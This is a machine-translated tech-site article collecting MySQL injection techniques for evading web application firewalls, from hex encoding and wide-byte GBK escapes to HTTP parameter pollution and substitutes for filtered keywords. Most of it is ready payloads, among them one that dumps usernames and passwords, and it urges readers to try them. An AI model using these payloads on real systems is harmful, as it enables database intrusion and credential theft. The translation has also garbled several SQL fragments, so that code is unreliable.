Shulou(Shulou.com)05/31 Report--

This article mainly introduces "what is the basic way of MySQL injection to bypass WAF". In daily operation, I believe that many people have doubts about the basic way of MySQL injection to bypass WAF. The editor consulted all kinds of data and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the question of "what is the basic way of MySQL injection to bypass WAF?" Next, please follow the editor to study!

SQL injection bypassing WAF

The foundation bypasses 1. Case bypass

Cases where case does not match when used for filtering:

SeLECt * from table

two。 Double write bypass

Used to delete forbidden characters directly:

For example, use preg_replace () or str_replace () to replace keywords such as and, or, select, union, and so on with empty strings.

At this point, you can use double write nesting to bypass, or is written as oorr,and as aandnd, select as seselectlect, and union as uniunionon. After deleting a keyword, the rest can be reassembled into a complete keyword.

3. Inline comment

The purpose of inline comments is to increase the portability of SQL statements. For example, MySQL-specific syntax is written in the form of inline comments, in which case MySQL can normally parse and execute the code in inline comments, but other SQL servers ignore the contents of inline comments.

/ *! MySQL-specific syntax * /

For example, a MySQL server can recognize the STRAIGHT_JOIN keyword in the following statement, while other servers cannot:

SELECT / *! STRAIGHT_JOIN*/ col1 FROM table1,table2 WHERE...

If it is! When a version number is added later, the syntax in the comment is executed only if the MySQL version is greater than or equal to the specified version number. For example, the keyword KEY_BLOCK_SIZE in the following comment is executed only by servers with MySQL version 5.1.10 or later:

CREATE TABLE T1 (an INT, KEY (a)) / *! 50110 KEY_BLOCK_SIZE=1024*/

Comments of / *! * / type, internal statements will be executed

Select bbb from table1 where aaa='' union / *! Select database () * /

Can be used to bypass some WAF, or to bypass spaces

However, keywords cannot be separated by comments, for example, the following statements are not executable (or can only be executed in some older versions)

Select bbb from table1 where balabala='' union seplet database () * /

4. Use hexadecimal to bypass specific characters

If the table name is filtered when querying the field name, or if certain characters in the database are filtered, you can use hexadecimal bypass.

Select column_name from information_schema.columns where table_name=0x7573657273

0x7573657273 is the hexadecimal encoding of users

5. Wide byte, Latin1 default encoding

Wide byte injection

Here are some common URL encodings

ASCII value URL Encoding\% 5C'%27 "% 22% 23% 26

Utilization conditions of wide byte injection

Query parameters are surrounded by single quotation marks, and the incoming single quotation marks are escaped by the escape character\, such as using addslashes (), mysql_real_escape_string () or other escape functions for received parameters in the background database.

The database is encoded as GBK

In a nutshell, single quotes are escaped but encoded as GBK.

Utilization mode

GET form

Id=-1%DF' union select 1 dint user (), 3% 23

Under the above conditions, the single quote'is escaped as\', that is,% 5c%27. If we put% df before the single quotation mark, we will form% df%5c%27, while in the GBK encoding mode,% df%5c is the Chinese character "df%5c", so the single quote successfully escaped.

If you are in the request body, you need to use the POST parameter. Grab the request using Burp Suite, and then add% df before the single quotation mark (% 27).

Uname=%df%27 and 1, 2 UNION SELECT 1, (SELECT GROUP_CONCAT (username,password SEPARATOR 0x3c62723e) FROM users) # & passwd=2

Principle of wide byte injection

When MySQL uses GBK coding, it will think that two characters are one Chinese character, for example,% aa%5c is a Chinese character. Since the main escape method is to add a backslash\ in front of sensitive characters, you can find a way to remove the backslash here.

% df eat\

Actually, the first character here is not limited to% df, as long as it is in the range of% aa to% fe. The specific reason is that urlencode (\') =% 5c%27, we add% df before% 5c%27 to form% df%5c%27,MySQL when encoding in GBK, two bytes will be regarded as a Chinese character, at this time,% df%5c will be regarded as a Chinese character, and% 27 will be outside as a separate symbol. At the same time, our goal has been achieved.

Filter out\'in\'

For example, if you can construct% 5c%5c%27, the following% 5C will be commented out by the previous% 5C. This is also a method of bypass.

The addslashes () function returns a string that adds a backslash before a predefined character.

After the escape of predefined characters,\\'\'"\"

This function can be used to prepare strings for strings stored in the database as well as database query statements.

When using addslashes (), we need to set mysql_query to binary in order to defend against this vulnerability.

Latin1 coding

The coding of the Mysql table defaults to latin1. If you set the character set to utf8, there are some characters in latin1 that are not in utf8. How does Mysql deal with these characters? Directly ignore

So we can type username=admin%c2 and store it in the table and it becomes admin.

The above% c2 can be changed to any character between% c2-%ef

6. Substitution of commonly used characters and-> & & or-> | Space-> / * * /->% a0->% 0a-> + #->-+->; (php or '1characters matching 1 =-> like-> regexp->-> in Note: regexp is regular matching, so there are some new injection methods using regularization.

Note that because & is the delimiter between the different parameters in URL, the & needs to be URL encoded as% 26 in the front end.

Filter whitespace

Use the preg_replace () or str_replace () function to replace the blank character with an empty string.

Filter spaces and use coding to bypass. You can use the following symbols instead:

Symbol description 09TAB key (horizontal) 0a create a new line 0dreturn function TAB key (vertical) a0 space

Filter comment

Use the preg_replace () or str_replace () function to replace multiline comments / * * / and single-line comments-- and # with empty strings.

Bypass method: use closed bypass.

7. HTTP parameter pollution

HTTP parameter pollution

Since there is no associated HTTP RFC that defines the semantics of HTTP parameter operations, each Web application may handle multiple parameters of the same name in an unused way.

In a single HTTP request, an attacker uses multiple parameters with the same name to split the keywords in the injection statement into the value of each parameter.

For example, index.php?par1=val1&par1=val2

The following table shows how different Web servers manage the same parameter that occurs multiple times.

HTTP backend overall parsing result example ASP.NET/IIS specific parameters all content splicing par1=val1,val2ASP/IIS specific parameters all contents splicing par1=val1,val2PHP/Apache last appearing parameter content par1=val2PHP/Zeus last appearing parameter content par1=val2JSP,Servlet/Apache Tomcat first appearing parameter content par1=val1

When the Web application concatenates the values of multiple parameters, you can get a complete injection statement. At the same time, if WAF only checks the value of each parameter individually, or if the entire request data is processed as a single string, such a security mechanism will not be able to detect HPP attacks. For example, ASP/IIS splices the values of recurring parameters.

Here are two scenarios for SQL injection: "regular attack" and "using HPP attack".

"regular attack" demonstrates the standard federated injection statement in the prodID parameter. This type of attack can be easily identified by Web Application Firewall (WAF). The second attack uses HPP on the prodID parameter. In this case, the prodID parameter occurs multiple times, and the injection statement is split in the value of each prodID. In order for WAF to recognize the complete injection statement, all the inputs need to be spliced together to check.

Regular attacks: http://webApplication/showproducts.asp?prodID=9 UNION SELECT 1, 2, 3, FROM Users WHERE id=3-

Use HPP to attack: http://webApplication/showproducts.asp?prodID=9 / * & prodID=*/UNION / * & prodID=*/SELECT 1 & prodID=2 & prodID=3 FROM / * & prodID=*/Users / * & prodID=*/ WHERE id=3-

8. Commas are filtered.

Replace with join

-1 union select 1, 2, 2, 3

-1 union select * from (select 1) a join (select 2) b join (select 3) c% 23

Limit

Limit 2,1

Limit 1 offset 2

Substr

Select substr (database (), 5pr 1)

Select substr (database () from 5 for 1) from is the number of characters starting from, and for is the intercepted length.

Select substr (database () from 5) from 5 means to intercept from the fifth character

If for is filtered, too,

Select mid (reverse (mid (database () from (- 5) from (- 1))

If

Select if (database ()) = 'xxx',sleep (3), 1)

SELECT 1 and DATABASE () = 'security' and sleep (3)

Select case when database () = 'xxx' then sleep (5) else 0 end

9. Limit is filtered

Select user from users limit 1

Add restrictions

Select user from users group by user_id having user_id=1 (user_id is a column in the table)

11. And, or, & &, | | filtered

Can be replaced by the operator! ^ ~ and not xor

twelve。 The substitution of each character and function

Substitution of common functions

String interception / concatenation function:

Extracted from https://xz.aliyun.com/t/7169

The function indicates that SUBSTR (str,N_start,N_length) intercepts the specified string, which is a simple version of SUBSTRING. SUBSTRING () multiple formats SUBSTRING (str,pos), SUBSTRING (str FROM pos), SUBSTRING (str,pos,len), SUBSTRING (str FROM pos FOR len). RIGHT (str,len) intercepts the specified length from the rightmost part of the specified string. LEFT (str,len) intercepts the specified length from the leftmost part of the specified string. RPAD (str,len,padstr) completes the string padstr of the len bit to the right of str and returns a new string. If the str length is greater than the len, the length of the return value is reduced to the length specified by the len. LPAD (str,len,padstr) is similar to RPAD and is patched on the left side of str. MID (str,pos,len) is identical to SUBSTRING (str,pos,len). INSERT (str,pos,len,newstr) in the original string str, replaces a string of len characters starting with the pos bit on the left with the new string newstr, and then returns the replaced string. INSERT (str,len,1,0x0) can be used as an intercept function. CONCAT (str1,str2 …) Function is used to merge multiple strings into a single string GROUP_CONCAT (...) Returns a string result that is composed of value concatenations in the group. MAKE_SET (bits,str1,str2, …) According to parameter 1, return the other parameter values entered. It can be used as a Boolean blind injection, such as: EXP ((LENGTH (DATABASE ()) > 8) + 1)).

Substitution of numbers:

It is replaced by the combination of mathematical operation functions such as true, false, pi (),!, floor, ~, ceil (), version (), etc.

Function / statement

Description

LENGTH (str) returns the length of the string. PI () returns the specific value of π. REGEXP "statement" regularly matches the data and returns a Boolean value. LIKE "statement" matches data,% represents arbitrary content. The return value is a Boolean. RLIKE "statement" is the same as regexp. LOCATE (substr,str, [pos]) returns the location where the substring first appears. POSITION (substr IN str) is equivalent to LOCATE (). LOWER (str) converts all uppercase letters of a string to lowercase. Same as: LCASE (str). UPPER (str) converts all lowercase letters of a string to uppercase. Same as: UCASE (str). ELT (NMagol str1 ~ str2 ~ ~ str3, …) With MAKE_SET (bit,str1,str2...) Similarly, parameter values are returned based on N. NULLIF (expr1,expr2) returns expr1 if expr1 is the same as expr2, NULL otherwise. CHARSET (str) returns the character set used by the string. DECODE (crypt_str,pass_str) uses pass_str as the password to decrypt the encrypted string crypt_str. Encryption function: ENCODE (str,pass_str). At this point, the study on "what is the basic way for MySQL injection to bypass WAF" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.